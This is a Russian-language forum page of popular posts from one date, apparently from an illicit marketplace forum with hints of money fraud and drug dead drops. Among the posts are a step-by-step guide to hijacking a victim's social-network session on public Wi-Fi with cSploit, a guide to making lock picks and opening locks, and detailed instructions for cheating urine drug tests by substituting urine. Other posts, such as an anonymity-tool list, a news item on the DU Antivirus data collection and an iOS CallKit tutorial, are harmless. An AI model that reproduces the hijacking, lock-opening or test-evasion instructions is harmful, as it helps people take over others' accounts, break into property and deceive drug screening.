Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
15.01.2023 - 15.01.2023
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 15.01.2023 в Сообщения
-
2 балла
-
1 баллПо сути вся черная пятница тупой мусор , а не распродажа
-
1 балл
-
1 баллвсе правильно у него горит , потому что козлов больно много появилось в нашей стране
-
1 баллТс залив на банковский счет можешь сделать?
-
1 баллИногда не нужно торопиться рассылать предупреждения и спасать мир
-
1 баллВ отличие от грубого взлома, часто дверные отмычки не повреждают замок, давая возможность использовать его в дальнейшем, открывая родным ключом. Манипуляционное вскрытие всегда впечатляло людей наблюдающих за этим процессом со стороны. Однако многим и в голову не приходит, что это эффектное дело может оказаться более доступным, стоит лишь проявить терпение и сноровку. Что необходимо для успешной работы отмычкой? Научиться работать отмычкой против слабо защищенных запирающих устройств может каждый. Для этого, каких то особенных навыков не требуется, а вот пройти «сквозь замки» 3 и 4 класса защиты – вот настоящее мастерство. Для вскрытия хорошо защищенных замков с помощью отмычки мало иметь под рукой подходящий инструмент, нужно обладать необходимым набором навыков и умений, которые требуется постоянно оттачивать. Нужно овладеть механическими навыками. Проще говоря, нужно научиться контролировать свои руки, ведь во многом именно от их ловкости зависит конечный результат. Тренировать пальцы и кисти рук нужно так, чтобы они могли прилагать нужные усилия, находясь в разном положении (даже весьма неудобном). Кроме того, необходимо координировать усилия рук со слухом и чувствительностью почти как во время игры на флейте или фортепьяно. Нужно обладать хорошим воображением. Говорят, что воображение дается не только от природы, его можно и нужно развивать. Однако если нет природных задатков, в этом направлении развиваться можно, но успехов вы не добьетесь. Развивать воображение нужно в реконструктивном направлении, иными словами нужно представлять внутреннее устройство замка, воображая, как в него входит отмычка и поочередно смещает элементы секрета. Если удастся добиться того, чтобы воображаемая картинка соответствовала действительному поведению замка при воздействии на него отмычкой, то считайте, цель достигнута. Нужно научиться анализировать получаемую информацию. Во время «тактильного» и слухового контакта с замком, вы получаете достаточное количество информации для того, чтобы без проблем его вскрыть. Проблема в том, что новичок эту информацию не может правильно обработать, а в худшем случае вообще не в состоянии ее получить в силу своих скромных способностей и задатков. Решить проблему поможет только практика, чем больше замков будет вскрыто, тем более глубокий анализ вы сможете делать. Изготавливаем набор отмычек своими руками Приобретать отмычки в интернет-магазине довольно дорого. Плюс ко всему в наборах заводских отмычек не всегда есть весь необходимый инструмент, не говоря уже о его качестве. Поэтому мы изначально не ищем легких путей, пробуя изготовить необходимые отмычки самостоятельно. Чтобы изготовить свои первые отмычки нам потребуется: наждак; набор напильников и надфилей (который придется подпортить); набор отверток; тиски и плоскогубцы; молоток; и самое главное мозги и прямые руки. Кроме указанного списка, потребуются еще шаблоны для изготовления различных отмычек. Но их довольно легко можно найти в сети Интернет, поэтому говорить о них подробно мы не будем. Теперь нам нужно взять набор надфилей и напильников и превратить его в набор отмычек, видоизменив их острые металлические ручки. Дело в том, что напильники и надфили сделаны из прочной инструментальной стали, а значит, отмычки будут прочными и выдержат значительные нагрузки. Для начала сделаем крючкообразные отмычки. Сверяясь с конфигурацией стержня в соответствии с шаблоном, обрабатываем кончик ручки надфиля, придавая ему нужную форму. Затем очень аккуратно зажав надфиль в тиски, сгибаем его плоскогубцами под нужным углом. То же самое проделываем с другими крючкообразными отмыкающими приспособлениями, их у вас получится три. Теперь изготовим отмычку с зубчиком на конце, предназначенную для поднятия пинов цилиндрового замка. Для этого находим шаблон соответствующей отмычки и определяем размеры зубца. Затем на наждаке стачиваем толстую часть ручки надфиля, оставив часть похожую на зубец. Теперь зажимаем нашу заготовку в тиски и обрабатываем ее напильником для придания зубцу нужной формы, не забыв обточить острые края. Далее изготовим отмычку-гребенку. Берем напильники и протачиваем на его ручке несколько углублений с помощью второго напильника, таким образом, чтобы получились зубцы. С размерами нам поможет шаблон. Важно! Размеры и посадку зубцов часто довольно сложно реализовать на заготовке, пользуясь одним лишь напильником и линейкой, поэтому приготовьтесь к тому, что придется испортить ни одну отмычку, прежде чем получится что-то стоящее. Кроме вышеуказанного набора отмычек, нам потребуется хороший натяжитель и свертыш. Натяжитель довольно просто можно сделать из изогнутого шестигранного ключа, грани которого нужно обточить на наждаке. Свертыш же сделаем из отвертки со стержнем подходящей толщины, согнув его молотком под нужным углом. Основы вскрытия отмычкой цилиндрового замка вскрытие цилиндрового замка Для вскрытия цилиндрового замка нам потребуется натяжитель и отмычка с зубчиком на конце. Сначала вставляем в замочную скважину натяжитель и пытаемся повернуть личинку в сторону открытия, создавая напряжение. Затем вводим в замок отмычку с зубцом и пытаемся поймать первый пин. На каждое наше действие замок отвечает легкими щелчками, поэтому слушайте внимательно и реагируйте правильно. Первая наша задача не снимая напряжения с цилиндра, зацепить первый пин, придав ему положение, соответствующее открыванию. Как только это удастся, цилиндр немного сдвинется, далее на очереди следующий пин и так до тех пор, пока замок не откроется. Довольно редко удается после первого перебора пинов вскрыть замок, поэтому пройдя ряд секретных элементов один раз, не стесняйтесь повторить попытку. Со второго раза наверняка получится. Помните! Манипулируя отмычкой в цилиндре нужно быть предельно осторожным, ведь личинка внутри достаточно хрупка. Вскрываем сувальдный замок при помощи отмычки При вскрытии отмычкой сувальдного замка также очень важно чувствовать пальцами секретный механизм. Ведь заглянуть внутрь нельзя, а тяжелые пластины нужно правильно приподнять, оставляя при этом засов в напряжении. Все это требует изрядных тренировок. Но если есть желание научиться, то почему бы и нет? Для манипуляционного вскрытия сувальдника нам потребуется свертыш-натяжитель, сделанный из согнутой под прямым углом плоской отвертки и крючкообразная отмычка подходящих размеров. Кончик крючка отмычки лучше предварительно подточить, а в замочную скважину интересующего нас запирающего устройства брызнуть жидкость WD-40. Она облегчит движение пластин. Вводим в замочную скважину отвертку-натяжитель до конца и поворачиваем ее в сторону открывания замка. Удерживая засов в напряжении, вставляем крючкообразную отмычку и начинаем ловить первую пластину. Как только нам это удается, приподнимаем ее, одновременно пытаясь сделать оборот свертышем. Далее ловим вторую пластину, затем третью и так далее пока замок не откроется. В заключение отметим, что знать основы манипуляционного вскрытия запирающих устройств должен каждый хороший хозяин. Ну а отмычки для замков можно и своими руками сделать. Чтобы стать высококлассным специалистом в этой области нужны интерес, увлеченность и годы тренировок. Но ведь для того, чтобы найти выход из жизненной ситуации связанной с замком в большинстве случаев достаточно знать основы!
-
1 балл
-
1 баллНи для кого не секрет, что рабство никуда не исчезало, оно лишь стало более завуалированным.
-
1 балл
-
1 баллВ связи с тотальной прослушкой интернет-каналов и прозрачностью коммерческих интернет-компаний перед государственными органами сейчас остро встал вопрос о мерах противодействия. Для пользователя самый эффективный вариант — использование криптографических инструментов и децентрализованных сервисов. Ниже предоставлен список доступных способов анонимизации и защиты своих прав. Использовать на свой страх и риск. AnoNet — децентрализованная сеть между друзьями с использованием VPN и программных BGP-маршрутизаторов. http://wiki.ucis.nl/Anonet BitPhone — мобильное коммуникационное устройство, работающее на базе децентрализованной сети в стиле Bitcoin. https://bitphone.net/#home BitMessage — коммуникационный протокол P2P, используемый для обмена зашифрованными сообщениями от одного пользователя ко многим подписчикам. https://bitmessage.org/wiki/Main_Page Commotion Wireless open source коммуникационный инструмент, работающий на мобильных телефонах, компьютерах и других беспроводных устройствах для создания децентрализованных mesh-сетей. https://commotionwireless.net Cryptosphere — распределенное зашифрованное облачное хранилище на базе модели данных Git. https://github.com/cryptosphere/cryptosphere Drogulus (WIP) — программируемое P2P-хранилище данных с поддержкой криптографии. http://drogul.us Сеть eDonkey — файлообменная децентрализованная сеть для обмена большими файлами. http://en.wikipedia.org/wiki/EDonkey_network Freenet — свободное программное обеспечения для анонимного обмена файлами, публикации сайтов (доступны только через Freenet), чатов и форумов. https://freenetproject.org Freifunk — некоммерческая инициатива по созданию свободной децентрализованной mesh-сети. Прошивки Freifunk основаны на OpenWRT и OLSR или B.A.T.M.A.N. http://wiki.freifunk.net/Kategorie:English GNUnet — фреймворк для безопасных peer-to-peer коммуникаций без использования центральных или промежуточных серверов. https://gnunet.org Grimwire — браузерное приложение, которое использует Web Workers для изоляции процессов и WebRTC для peer-to-peer коммуникаций. https://github.com/pfraze/grimwire Guifi — европейская (преимущественно, испанская) большая mesh-сеть с более чем 22000 активными узлами WiFi и 25 км оптоволокна. http://guifi.net Hyperboria - ставит целью создание устойчивого децентрализованного альтернативного интернета. https://hyperboria.net I2P — анонимизирующая сеть, использующая несколько уровней шифрования. https://geti2p.net/ru Kademlia — распределенная хэш-таблица для P2P-сетей. http://en.wikipedia.org/wiki/Kademlia NameCoin — распределенная система DNS на технологии Bitcoin. http://namecoin.info Nightweb — экспериментальное приложение для Android или ПК, которое позволяет публиковать контент и общаться через BitTorrent поверх I2P. https://sekao.net/nightweb LibreVPN — виртуальная mesh-сеть с конфигурационными скриптами, позволяющими поднять собственный mesh-VPN. http://librevpn.org.ar OpenNIC Project — открытый и демократичный альтернативный DNS-провайдер. http://www.opennicproject.org Osiris — ПО для децентрализованного портала, управляемого и работающего по P2P. http://www.osiris-sps.org PeerCDN — автоматически раздает статичные ресурсы на сайте (изображения, видео, файлы) через P2P-сеть, составленную из посетителей, который в данный момент находятся на сайте. https://peercdn.com PeerCoin/PPCoin — первая криптовалюта, основанная на реализации одновременно систем proof-of-stake и proof-of-work. http://ppcoin.org PeerServer — пиринговая клиент-серверная технология, с использованием WebRTC, где ваш браузер работает как сервер для других браузеров через пиринговые P2P-каналы WebRTC. http://www.peer-server.com Phantom — система децентрализованной интернет-анонимности. https://code.google.com/p/phantom Project Byzantium — Linux-дистрибутив с поддержкой беспроводных mesh-сетей, который обеспечит связь в случае стихийного бедствия или аварии интернет-провайдера. http://project-byzantium.org Quick mesh project — прошивка на базе OpenWRT для создания mesh-сетей. http://qmp.cat/Home RetroShare — open-source, децентрализованная коммуникационная платформа для чатов и обмена файлами. http://retroshare.sourceforge.net Serval Project позволяет осуществлять звонки между мобильными телефонами без использования базовых станций. http://www.servalproject.org Syndie — немецкая open-source система для поддержки распределенных форумов. http://syndie.i2p2.de Tahoe-LAFS — свободная распределенная файловая система с дублированием информации. https://tahoe-lafs.org Telehash — новый криптографический протокол на базе JSON, позволяющий быстро создавать защищенные P2P-приложения. http://telehash.org FNF — организация Free Network Foundation для информационной поддержки в создании локальных беспроводных сетей. https://thefnf.org Tonika — распределенная социальная сеть, в которой коммуникации осуществляются напрямую между друзьями. http://pdos.csail.mit.edu/~petar/5ttt.org Tor — многоступенчатая сеть анонимайзеров, браузер. https://www.torproject.org Tox — проект, ставящий целью создать P2P-альтернативу Skype. https://tox.chat Tribler — проект по созданию интернета, свободного от цензуры, развивается уже восемь лет. Торрент-клиент работающий через сеть Tor. http://www.tribler.org Unhosted — бессерверные веб-приложения, которые исполняются в браузере клиента. https://unhosted.org Vole — социальная сеть в браузере, без центрального сервера, использует Bittorrent, Go и Ember.js, а также Bittorrent Sync. http://vole.cc ZeroNet - сеть распределённых децентрализованных веб-сайтов на основе Bitcoin. https://zeronet.io ZeroTier One — open source приложение для создания огромных распределенных Ethernet-сетей. Используется end-to-end шифрование для всего трафика. Есть коммерческая и бесплатная версия. https://www.zerotier.com Помните: используя криптографические (шифровальные) системы, вы не нарушаете закон — вы защищаете своё право на анонимность.
-
1 баллНебольшое предисловие. Как часто вы подключаетесь к общественным сетям? Держу пари, не всегда есть возможность «закинуть» себе денег на телефон, но нужда в подключении к Интернету существует всегда. Представьте, вы едете в троллейбусе, и ведёте переписку со своей второй половинкой. И в один момент у вас внезапно заканчивается доступный трафик. К сожалению, в троллейбусе негде пополнить счёт, но ведь всегда есть общественный Wi-Fi! Если вы не особо заботитесь о безопасности своих данных, смело к нему подключайтесь и продолжайте обмениваться смайликами со своей любимой, или любимым. Однако, если вам важна ваша конфиденциальность, есть смысл продолжить читать данную статью, ведь при наличии смартфона с Root-правами каждый первый может попросту украсть ваш аккаунт в соц-сети, или получить доступ к вашему почтовому ящику. Теоретическая часть. Обмен данными в интернете происходит в зашифрованном виде. В рамках данной статьи нас не интересует, как происходит отправка пакетов данных от пользователя к веб-серверу. Нас больше интересует обратный путь датаграмм к пользователю. Итак, после обработки HTTP-запроса сервер проверяет, имеет ли клиент право использовать GET-запрос, и если ответ положительный – сервер находит контент, запрашиваемый клиентом, шифрует его в пакет, и с помощью PHP отправляет результат назад. Вор информации не может использовать GET- запрос, так как доступ к нему имеется только у человека, владеющего нужной информацией (в случае с соц-сетью - это логин и пароль). Однако не всегда хакеру нужно отсылать GET-запрос - достаточно чтоб это сделал человек, находящийся с ним в одной подсети. Этой подсетью в данном случае и выступает Wi-Fi сеть. Взломщику лишь достаточно в нужный момент «подцепить» приходящий пакет данных, который в любом случае проходит через подсеть, записать cookie, и дело в шляпе. Для проведения такого рода взлома и существует cSploit для Андроид. Как же это происходит на практике. Итак, краткий экскурс в программу. Официально cSploit используется для анализа Wi-Fi сети на безопасность, но мы будем рассматривать немного иное применение программы. Но только в рамках закона. Внимание! Для работы программы необходимы Root-права и библиотеки BusyBox. Надеюсь, с их установкой не должно возникнуть проблем. Теперь, когда мы более детально знаем, как и когда пользователь получает данные с сервера, пришло время рассмотреть способ их перехвата с помощью сSploit. Инструкция. Установить Root права, а также BusyBox. Скачать cSploit, и также установить его на смартфон. Если первые два шага были выполнены корректно - при запуске приложения и подключении к Wi-Fi вы увидите все подключенные к сети устройства. Далее необходимо выбрать «жертву» и тапнуть по ней один раз. Перед вами появилось множество интересных модулей для влияния на выбранный девайс, но нас интересует раздел MITM (man-in-the-middle). Выбираем его. Далее выбираем раздел «сниффер сессий». Не вижу смысла объяснять что это такое, ведь название говорит само за себя J Теперь, если вы знакомы с жертвой лично, можете посредством соц. инженерии «убедить» его, что ему срочно надо зайти к себе в «Контакт», либо дождаться когда он это сам сделает. В момент, когда жертва войдет в свой аккаунт - на вашем смартфоне в списке перехваченных сессий появится новая, зачастую проименнованная простым IP сессия, которую и надо перехватить. Производим перехват простым тапом и подтверждением. Профит! Открывается браузер со страничкой жертвы. Теперь вы можете вносить изменения на аккаунте жертвы, читать и писать сообщения, а также загружать фото (к примеру). Как видите, для взлома необязательно иметь обширные знания в области программирования, принадлежать к Анонимусу, или иметь крутой хакерский софт на пару с мощными девайсами. Каждый ребёнок при должной сноровке может провернуть такое нехитрое дельце, именно поэтому целью данной статьи было не выращивание нового поколения хакеров, а предупреждение о возможной опасности ваших данных. Будьте бдительны, осторожны, и не размещайте слишком много информации о себе в Интернете. Всем удачи!
-
1 балл
-
1 баллИнформация в разных источниках сильно отличается и тяжело дать однозначный ответ, но я постарался подобрать для вас максимально полезную и достоверную информацию. Виды тестов и их особенности Есть несколько способов определения наличия вредных токсинов и продуктов их распада в организме – это взять на анализ Ваши волосы, ногти, кровь, слюну, пот и мочу. В России основное распространение получил анализ мочи. Поэтому мы кратко опишем особенности сдачи других тестов, а про сдачу анализа мочи расскажем подробнее. В волосах и ногтях метаболиты вредных токсинов остаются дольше всего, но в России эти тесты большая редкость. Их проводят в исключительных случаях. Метаболиты вредных токсинов - побочные продукты их распада, остающиеся в Вашем организме после их употребления. Экспресс тесты имеют пороговый уровень 50 ng/l метаболитов вредных токсинов в анализе. Это означает, если у Вас 51 ng/l в моче, Вы потерпите неудачу, и если у Вас - 49 ng/l, Вы пройдете тест. Проблема иммуно-хроматографических тестов в том, что они не очень точны, и могут давать ложно-положительные результаты в 25 % случаев. Ложное положительное показание означает, что исследование показывает наличие в анализе запрещённых вредных токсинов, когда фактически другое вещество (Ибупрофен, Противозастойное средство, Мак, и т.д.) стало его причиной. Надо быть осторожнее при приёме лекарственных средств без рецепта. Ложно положительная реакция на наличие метаболитов вредных токсинов в вашем анализе будет поводом для отправления его на более точное, дорогостоящее исследование в лабораторию. Именно поэтому ВАЖНО пройти экспресс тест, что бы не было повода для детального исследования вашего анализа мочи в лаборатории на примеси, химический состав и др. Какие бывают тесты на наличие наркотика в моче? Это самый распространенный тест, так-что я уделю ему особое внимание. Их существует огромное множество. Дешевые определяют 1-2 наркотика, дорогие до 10 и больше. Вот пример самого дешевого теста на марихуану в моче: А вот этот тест чаще всего используется в больницах РФ: Пример дорогого теста на 5 наркотиков: Как можно понять из этих фото, если вы употребляете относительно непопулярный наркотик (мет, кокс) то велика вероятность, что при стандартной процедуре проверки в вашей моче не обнаружат следы употребления этих веществ. Мифы про обман теста на наркотики в моче Уксус: Добавление уксуса к Вашей моче резко изменит её РН. Один из тестов на образце мочи - проверка уровня PH. Вы не пройдёте тест, если Вы добавите уксус к своему анализу. Visine: Добавление Visine к Вашему анализу мочи вспенит его и вызовет непосредственное подозрение. Не добавляйте Визина к своему образцу мочи. Вы рискуете отправиться на освидетельствование более точным методом в лабораторию. Аммиак: Добавление аммиака к Вашей моче аналогично уксусу сильно изменит уровень РН. Результат описан выше. Столовая соль: Добавление соли к Вашему образцу даст отрицательный результат теста, но выводит удельную массу из нормальных диапазонов тела (Удельная масса - один из проверяемых параметров в анализе). Остаток соли может также быть замечен на дне ёмкости для анализа. Вы не пройдете тест, если добавите столовую соль к своему анализу. Средство для чистки труб - При его добавлении PH образца изменится резко, и моча приобретёт синеватый оттенок. Вы не пройдете тест. Отбеливатель - Та же самая вещь как и очиститель канализационных труб. Кроме всего, все эти добавки испортят экспресс тест, а не обманут его. То есть тест-полоски покажут ошибочный результат, что будет поводом для лишних подозрений и проведения повторного теста или отправки Вас для более точного аназиза в стационарную лабораторию. Как все таки можно обмануть тест на наркотики в моче? Разных креативных способов великое множество, но большинство из них работают только в теории. Эти два работают на 90% стабильно. Вариант первый: подмена мочи. Моча для теста на наркотики в больницах/школах/университетах/военкомате сдается в туалете с закрытой дверью. Вы можете незаметно принести чужую мочу и просто налить ее в стакан. Важно, эта моча не должна быть старше 12 часов и она должна быть теплой. Сосуд с мочей следует держать вплотную к телу для поддержания температуры. Кстати, существуют специальные химические нагревательные элементы, они компактные и выполнены в виде небольшого пакета, как увеличенная пачка презервативов. Вариант второй: очистка организма. Тут тоже есть два способа. Способ первый: разгон метаболизма. Подходит в том случае, если у вас есть хотя-бы неделя до прохождения теста. Пейте 4+ литра воды в сутки. Пейте мочегонное. Займитесь спортом (кардио). Вам нужен учащенный пульс и обильное потоотделение. Попробуйте сходить в баню. Не ешьте жирную еду. Ешьте больше овощей. Принимайте витамины группы В. В день теста перед проверкой обязательно сходите в туалет 2-3 раза. Все эти действия помогут понизить концентрацию наркотических веществ в вашей моче и тест их не распознает. Способ второй: экспресс детоксикаторы. Можно найти в интернете, но я не советую брать специализированные под экспресс очистку организма от наркотиков. Чаще всего это мошенники, которые продают нерабочие препараты по цене от 100$. Возьмите детоксикатор для чистки печени, почек и ЖКТ и совместите его прием с первым способом. Как очистить кровь и слюну? Так же, как и в случае с мочей. Как вывести наркотики из ногтей или волос? Увы, никак. Даже если вы побреете все тело и вырвите себе ногти (что само по себе достаточно подозрительно), наркотик можно будет обнаружить в волосяных луковицах. А если и их вы удалите (лазерная эпиляция), его можно будет обнаружить в межклеточной ткани. Неприятная процедура. Благо в странах СНГ, как правило, все заканчивается проверкой мочи. Вывод: Ваша задача - не завалить тест мочи. Остальные тесты обмануть будет куда сложнее. Для этого откажитесь от употребления за 10 дней и начните процедуру очистки организма. Много воды, правильное питание. Сходите в туалет перед сдачей мочи. Если вы не могли знать заранее о тесте - сдайте чужую мочу. Не покупайте синтетическую мочу, возьмите чистую мочу другого человека. При сдаче она должна быть свежей (не старше 12 часов) и теплой (32,5-37 градусов Цельсия).
-
1 балл
-
1 балл
-
1 баллСпасибо дружище , закладочку забрал свою, рад сотрудничеству
-
1 баллАнтивирус был скачан и установлен от 10 млн до 50 млн раз. Google удалила, а затем снова вернула в магазин Google Play один из самых популярных мобильных антивирусов. Компании пришлось удалить приложение DU Antivirus Security от DU Group (является частью китайского конгломерата Baidu), поскольку, по словам исследователей из Check Point, оно втайне от пользователей собирало данные с их смартфонов. Антивирус был скачан и установлен от 10 млн до 50 млн раз. Как сообщили эксперты Check Point, когда пользователь впервые запускал DU Antivirus Security, приложение записывало уникальные идентификаторы устройства, список контактов, журнал звонков и геолокационные данные (если возможно). Затем в зашифрованном виде данные передавались на удаленный сервер с IP-адресом 47.88.174.218. Поначалу исследователи решили, что сервер контролируется операторами вредоносного ПО. Тем не менее, как показало изучение записей DNS и примыкающих поддоменов, размещенные на сервере домены зарегистрированы на сотрудника Baidu. Собранная антивирусом информация затем использовалась другим приложением от DU Group под названием Caller ID & Call Block – DU Caller, предоставляющим пользователям данные о входящих звонках. 21 августа текущего года представители Check Point уведомили Google о неприемлемой активности антивируса, и 24 августа DU Antivirus Security был удален из Google Play. Производитель удалил из приложения часть кода, ответственную за сбор данных, и спустя несколько дней антивирус снова появился в магазине. По словам исследователей, механизм сбора информации присутствует в DU Antivirus Security v3.1.5 и, возможно, в более ранних версиях (в Check Point не тестировали более ранние версии). Эксперты решили проанализировать на наличие данного кода и другие приложения. В общей сложности они обнаружили его в 30 программах, 12 из которых опубликованы в Google Play. Как пояснили исследователи, разработчики могли реализовать вредоносный код в качестве внешней библиотеки, отправляющей собранные данные на тот же используемый DU Caller удаленный сервер. Вредоносные приложения, втайне собирающие данные пользователей, могли установить от 24 млн до 89 млн человек.
-
1 баллЕсли это и правда так просто, то зачем мы покупаем какие то взломы аккаунтов
-
1 баллЗаказывал 5шт PALIT GeForce GTX 1060, PA-GTX1060 STORMX 3G пришли все до одной, даже скидку сделал ТС , только по доставке немного обманули , на 4 дня дольше ждал , чем говорили , но скидку сделали и ладно)
-
1 баллКогда в CRM 57000 контактов, людям совсем не хочется записывать их в айфон вручную. Надо найти решение поизящней, которое позволит не просто искать контакты в отдельном приложении, но и отображать имя человека при входящем звонке. Мы долго гуглили, а потом вспомнили про анонс фреймворка CallKit с WWDC. Информации по этой теме оказалось не так много: немногословная документация, статья на Хабре и ни одного пошагового руководства. Хочу восполнить этот пробел. На примере создания простого приложения покажу, как научить CallKit определять тысячи номеров. Определяем один номер Для начала попробуем определить один единственный номер. Начнем с пустого проекта. Создадим Single View Application с именем TouchInApp. Добавим extension для определения номеров. В меню Xcode выберите File > New > Target… В разделе Application Extension выберите Call Directory Extension, нажмите Next. В поле Product Name введите TouchInCallExtension, нажмите Finish. В появившемся алерте нажмите Cancel. Надеюсь, вы уже подготовили тестовый телефон, с которого будете звонить. Если нет, то сейчас самое время. В Project navigator раскройте TouchInCallExtension и откройте CallDirectoryHandler.swift. Найдите функцию addIdentificationPhoneNumbers. Там вы увидите массивы phoneNumbers и labels. Удалите номера из phoneNumbers, впишите туда тестовый номер. Удалите содержимое массива labels, впишите туда «Test number». У вас получится что-то вроде этого: private func addIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) throws { let phoneNumbers: [CXCallDirectoryPhoneNumber] = [ 79214203692 ] let labels = [ "Test number" ] for (phoneNumber, label) in zip(phoneNumbers, labels) { context.addIdentificationEntry(withNextSequentialPhoneNumber: phoneNumber, label: label) } } CXCallDirectoryPhoneNumber — просто typealias для Int64. Номер должен быть в формате 7XXXXXXXXXX, то есть сначала код страны (country calling code), потом сам номер. Код России +7, поэтому в данном случае пишем 7. Поставьте приложение на устройство и тут же закройте. В нем пока нечего делать. Зайдите в настройки телефона > Phone > Call Blocking & Identification. Найдите там приложение TouchInApp и позвольте ему определять и блокировать вызовы. Бывает, что приложение не сразу появляется в списке. В таком случае закройте настройки, откройте и закройте еще раз приложение и попробуйте снова. Когда вы переводите Switch в состояние On, вызывается addIdentificationPhoneNumbers из ранее добавленного расширения и считывает оттуда контакты. Позвоните с тестового номера на ваше устройство. Номер должен определиться. Определяем тысячи номеров Все это, конечно, здорово, но это всего лишь один номер. А в начале статьи речь шла о тысячах контактов. Очевидно, что мы не будем их все вручную переписывать в массивы phoneNumbers и labels. Итак, контакты мы должны добавлять в расширении. Из приложения мы это сделать не можем. Мы можем лишь вызвать функцию reloadExtension, вызов которой приведет к вызову addIdentificationPhoneNumbers. О ней я расскажу чуть позже. Так или иначе, приложение будет иметь доступ к контактам. Либо они сразу будут с ним поставляться в определенном формате, либо мы будем получать их по запросу к API, либо как-то еще — неважно. Важно, что расширение должно каким-то образом получить эти контакты. Давайте на секунду отвлечемся и проведем небольшую аналогию. Представьте, что у вас есть кот. Если есть, можете не представлять. Вы просыпаетесь утром и собираетесь его покормить. Как вы будете это делать? По всей вероятности, насыпете корм в миску. А уже из нее кот покушает. А теперь представьте, что Call Directory Extension — это кот, а вы — приложение. И вы хотите накормить контактами Call Directory Extension. Что в нашем случае будет исполнять роль миски, которую мы должны наполнить контактами и из которой extension впоследствии будет их потреблять? К сожалению, вариантов у нас не так много. Мы не можем использовать Core Data или SQLite, так как очень сильно ограничены в ресурсах во время работы расширения. Когда вы редактировали функцию addIdentificationPhoneNumbers, вы наверняка заметили комментарии. Там говорится о том, что «Numbers must be provided in numerically ascending order.». Сортировка выборки из базы слишком ресурсоемка для расширения. Поэтому решение, использующее БД, нам не подходит. Все, что нам остается — использовать файл. Для простоты реализации будем использовать текстовый файл следующего формата: Использование этого формата не ведет к оптимальной производительности. Но это позволит сделать акцент на основных моментах, вместо того, чтобы погружаться в работу с бинарными файлами. Увы, мы не можем просто так взять и получить доступ к одному файлу как из приложения, так и из расширения. Однако, если воспользоваться App Groups, это становится возможным. Делимся контактами с помощью App Groups App Group позволяет приложению и расширению получать доступ к общим данным. Более подробно написано в документации Apple. Если вы никогда с этим не работали — не страшно, сейчас я расскажу, как это настроить. В Project navigator кликните по вашему проекту. Выберите target приложения, перейдите на вкладку Capabilities, включите App Groups. Добавьте группу «group.ru.touchin.TouchInApp». Логика тут та же, что и с bundle identifier. Просто добавьте префикс group. У меня bundle identifier — «ru.touchin.TouchInApp», соответственно, группа — «group.ru.touchin.TouchInApp». Перейдите к target'у расширения, перейдите на вкладку Capabilities, включите App Groups. Там должна появиться группа, которую вы вводили ранее. Поставьте на ней галочку. Если мы используем опцию «Automatically manage signing», App Groups настраиваются достаточно легко. Как видите, я уложился в пару абзацев. Благодаря этому я могу не превращать статью о CallKit в статью об App Groups. Но если вы используете профайлы из аккаунта разработчика, то нужно в аккаунте добавить App Group и включить ее в App ID приложения и расширения. Записываем контакты в файл После включения App Group можем получить доступ к контейнеру, в котором будет храниться наш файл. Делается это следующим образом: let container = FileManager.default .containerURL(forSecurityApplicationGroupIdentifier: "group.ru.touchin.TouchInApp") «group.ru.touchin.TouchInApp» — это наша App Group, которую мы только что добавили. Назовем наш файл «contacts» и сформируем для него URL: guard let fileUrl = FileManager.default .containerURL(forSecurityApplicationGroupIdentifier: "group.ru.touchin.TouchInApp")? .appendingPathComponent("contacts") else { return } Немного позже вы увидите полный код, сейчас я просто хочу пояснить некоторые моменты. Теперь нужно записать в него номера и имена. Предполагается, что они у вас уже подготовлены в следующем виде: let numbers = ["79214203692", "79640982354", "79982434663"] let labels = ["Иванов Петр Петрович", "Сергеев Иван Николаевич", "Николаев Андрей Михайлович"] Напомню, что номера должны быть с правильным кодом страны и отсортированы в порядке возрастания. Теперь сформируем из контактов будущее содержимое файла: var string = "" for (number, label) in zip(numbers, labels) { string += "\(number),\(label)\n" } Каждую пару номер-имя записываем в одну строку, разделяя запятой. Завершаем символом перевода строки. Записываем все это дело в файл: try? string.write(to: fileUrl, atomically: true, encoding: .utf8) А теперь самое интересное. Нужно сообщить расширению, что миска наполнена и пора подкрепиться. Для этого вызовем следующую функцию: CXCallDirectoryManager.sharedInstance.reloadExtension( withIdentifier: "ru.touchin.TouchInApp.TouchInCallExtension") Параметр функции — bundle identifier расширения. Полный код: @IBAction func addContacts(_ sender: Any) { let numbers = ["79214203692", "79640982354", "79982434663"] let labels = ["Иванов Петр Петрович", "Сергеев Иван Николаевич", "Николаев Андрей Михайлович"] writeFileForCallDirectory(numbers: numbers, labels: labels) } private func writeFileForCallDirectory(numbers: [String], labels: [String]) { guard let fileUrl = FileManager.default .containerURL(forSecurityApplicationGroupIdentifier: "group.ru.touchin.TouchInApp")? .appendingPathComponent("contacts") else { return } var string = "" for (number, label) in zip(numbers, labels) { string += "\(number),\(label)\n" } try? string.write(to: fileUrl, atomically: true, encoding: .utf8) CXCallDirectoryManager.sharedInstance.reloadExtension( withIdentifier: "ru.touchin.TouchInApp.TouchInCallExtension") } Читаем контакты из файла Но это еще не все. Мы не подготовили расширение к тому, чтобы оно могло этот файл прочесть. Попросим его читать файл по одной строчке, вычленять из строки номер и имя. Дальше поступаем так же, как с тестовым номером. Увы, iOS не предоставляет возможность читать текстовые файлы построчно. Воспользуемся подходом, предложенным пользователем StackOverflow. Скопируйте к себе класс LineReader вместе с расширением. Вернемся к файлу CallDirectoryHandler.swift и внесем изменения. Сначала получим URL нашего файла. Делается это точно так же, как и в приложении. Затем инициализируем LineReader путем к файлу. Читаем файл построчно и добавляем контакт за контактом. Код обновленной функции addIdentificationPhoneNumbers: private func addIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) throws { guard let fileUrl = FileManager.default .containerURL(forSecurityApplicationGroupIdentifier: "group.ru.touchin.TouchInApp")? .appendingPathComponent("contacts") else { return } guard let reader = LineReader(path: fileUrl.path) else { return } for line in reader { autoreleasepool { // удаляем перевод строки в конце let line = line.trimmingCharacters(in: .whitespacesAndNewlines) // отделяем номер от имени var 